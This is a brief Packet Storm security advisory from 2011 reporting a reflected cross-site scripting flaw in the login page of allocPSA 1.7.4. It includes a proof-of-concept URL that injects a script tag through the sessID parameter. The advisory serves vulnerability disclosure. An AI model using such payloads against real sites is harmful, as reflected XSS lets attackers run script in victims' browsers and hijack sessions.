allocPSA 1.7.4 Cross Site Scripting

2011-05-16T00:00:00
ID PACKETSTORM:101458
Type packetstorm
Reporter AutoSec Tools
Modified 2011-05-16T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................allocPSA 1.7.4  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://sourceforge.net/projects/allocpsa/  
Discovery Date..........5/12/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in allocPSA 1.7.4 can  
be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E  
`